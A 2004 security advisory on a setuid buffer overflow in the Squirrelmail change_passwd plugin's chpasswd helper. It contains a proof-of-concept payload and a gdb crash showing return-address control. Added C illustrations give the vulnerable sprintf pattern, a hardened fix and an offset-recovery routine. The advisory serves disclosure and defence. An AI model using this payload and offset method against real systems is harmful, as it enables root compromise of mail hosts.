[UNIX] Squirrelmail Change_passwd Buffer Overflow
From: SecuriTeam (support_at_securiteam.com)
Date: 04/18/04
To: list@securiteam.com
Date: 18 Apr 2004 13:53:11 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
Squirrelmail Change_passwd Buffer Overflow
------------------------------------------------------------------------
SUMMARY
The Change Passwd plugin (<http://www.squirrelmail.org/plugin_view.php?id=117>)
is "a Squirrelmail plugin to allow your users to change his/her system
password in /etc/passwd or /etc/shadow; the plugin uses a C program to make
possible the alteration of the password".
A buffer overflow in the plugin's setuid-root C helper (chpasswd) allows a
local attacker who can execute the binary directly (normally only root and
the web-server account, e.g. apache or nobody) to overflow an internal
buffer, execute arbitrary code and gain root privileges. In practice this
turns any code execution obtained as the web-server user on the mail host
into a root compromise.
DETAILS
Vulnerable Systems:
* Squirrelmail's Change_passwd version 3.1
Vulnerable code:
The vulnerable code is in main(), which formats the user-supplied argument
into a fixed-size buffer with sprintf() without checking that the data fits
in the destination.
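The following is an added illustration of the bug class described above, not the change_passwd plugin's own code: a setuid helper that formats an attacker-controlled argv string with sprintf() into a fixed-size stack buffer, next to a hardened version that validates the login name and uses a bounded call. The 128-byte buffer, the message text and the 32-character login-name limit are assumptions for the example.

```c
/* Added example, not the change_passwd plugin's code: the bug class from the
 * advisory (attacker-controlled argv formatted with sprintf() into a fixed
 * stack buffer inside a setuid-root helper) next to a hardened version.
 * Buffer size, message text and the 32-character login-name limit are
 * assumptions for this illustration. */
#include <ctype.h>
#include <stdio.h>
#include <string.h>

#define MSG_BUF  128   /* assumed destination buffer size */
#define MAX_USER 32    /* assumed login-name limit (what useradd enforces) */

/* Vulnerable pattern: sprintf() has no idea how big msg is, so a user longer
 * than MSG_BUF minus the fixed text runs off the end of the stack frame and
 * over the saved return address. Kept for comparison; do not call it. */
void report_unsafe(const char *user)
{
    char msg[MSG_BUF];
    sprintf(msg, "The user %s don't exist!\n", user);   /* overflow */
    fputs(msg, stderr);
}

/* Accept only portable login names: 1..MAX_USER chars from [a-z0-9._-],
 * not starting with '-'. Returns 1 if acceptable, 0 otherwise. */
int valid_username(const char *user)
{
    size_t n = strlen(user);
    if (n == 0 || n > MAX_USER || user[0] == '-')
        return 0;
    for (size_t i = 0; i < n; i++) {
        unsigned char c = (unsigned char)user[i];
        if (!(islower(c) || isdigit(c) || c == '_' || c == '-' || c == '.'))
            return 0;
    }
    return 1;
}

/* Hardened: validate first, then format with a bounded call and treat
 * truncation as an error. Returns 0 on success, -1 on rejection. */
int report_safe(char *msg, size_t msgsz, const char *user)
{
    if (!valid_username(user))
        return -1;
    int n = snprintf(msg, msgsz, "The user %s don't exist!\n", user);
    if (n < 0 || (size_t)n >= msgsz)
        return -1;   /* would not fit; nothing past msgsz was written */
    return 0;
}

/* What main() should do with argv[1]: 0 = message formatted, -1 = rejected. */
int handle_user(const char *user)
{
    char msg[MSG_BUF];
    return report_safe(msg, sizeof msg, user);
}

/* The advisory's 144-byte PoC argument: "BCDE" + 136 x 'A' + "0123". */
const char *poc_argument(void)
{
    static char poc[145];
    memcpy(poc, "BCDE", 4);
    memset(poc + 4, 'A', 136);
    memcpy(poc + 140, "0123", 5);   /* copies the terminating NUL too */
    return poc;
}

int main(void)
{
    printf("alice -> %d, PoC argument -> %d\n",
           handle_user("alice"), handle_user(poc_argument()));
    return 0;
}
```

The length check alone would stop the overflow; the character whitelist is there because the same string is later used to look up and rewrite an entry in /etc/passwd or /etc/shadow, where a name containing ':' or a newline is its own problem.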
Proof of Concept:
# export RET=`perl -e 'print "BCDE".("A"x136)."0123"'`
# gdb ./chpasswd
GNU gdb 6.0-debian
Copyright 2003 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i386-linux"...
(gdb) r $RET a a
Starting program: /home/noam/change_passwd/chpasswd $RET a a
The user BCDEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA0123 don't exist!

Program received signal SIGSEGV, Segmentation fault.
0x33323130 in ?? ()
(gdb) q
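Reading the crash: the faulting address 0x33323130 is, on little-endian i386, the bytes 30 31 32 33, i.e. the string "0123" that ends the PoC argument. The four bytes at offset 140 of the argument ("BCDE" plus 136 "A"s) therefore landed on the saved return address, which is what gives control of EIP. The following added example (not from the advisory) recovers that offset mechanically from the payload and the reported EIP, the same way one reads any fault after feeding a patterned argument; the payload and the EIP value are the ones shown in the gdb session above.

```c
/* Added example, not part of the advisory: recover the distance from the
 * start of the overflowed data to the saved return address, given the PoC
 * argument ("BCDE" + 136 x 'A' + "0123", 144 bytes) and the EIP gdb reported
 * (0x33323130). */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define POC_LEN 144

/* Recreate the advisory's PoC argument in buf (must hold POC_LEN + 1 bytes). */
void build_poc(char buf[POC_LEN + 1])
{
    memcpy(buf, "BCDE", 4);
    memset(buf + 4, 'A', 136);
    memcpy(buf + 140, "0123", 5);   /* copies the terminating NUL too */
}

/* Read 4 bytes little-endian, as an i386 CPU loads a saved return address. */
uint32_t le32(const unsigned char *p)
{
    return (uint32_t)p[0] | (uint32_t)p[1] << 8 |
           (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}

/* Offset within payload whose 4 bytes equal eip when read little-endian,
 * i.e. where the saved return address sits relative to the payload start.
 * Returns -1 if eip does not come from the payload at all (no control). */
long find_eip_offset(const unsigned char *payload, size_t len, uint32_t eip)
{
    for (size_t off = 0; off + 4 <= len; off++)
        if (le32(payload + off) == eip)
            return (long)off;
    return -1;
}

/* The advisory's own crash: PoC argument vs. EIP 0x33323130. Expect 140. */
long chpasswd_eip_offset(void)
{
    char poc[POC_LEN + 1];
    build_poc(poc);
    return find_eip_offset((const unsigned char *)poc, POC_LEN, 0x33323130u);
}

int main(void)
{
    char poc[POC_LEN + 1];
    build_poc(poc);
    long off = chpasswd_eip_offset();
    if (off < 0) {
        puts("EIP is not taken from the payload");
        return 1;
    }
    printf("saved EIP = payload bytes %ld..%ld (\"%.4s\")\n",
           off, off + 3, poc + off);
    return 0;
}
```

A match at offset 140 means the first 140 bytes of the argument fill the buffer and whatever lies between it and the return address; the next four bytes become the return address. Because the argument is passed through argv, its position on the stack changes from run to run, but this offset does not, which is why the pattern technique is reliable.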
ADDITIONAL INFORMATION
The information has been provided by <mailto:matias@neiff.com.ar> Matias Neiff.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.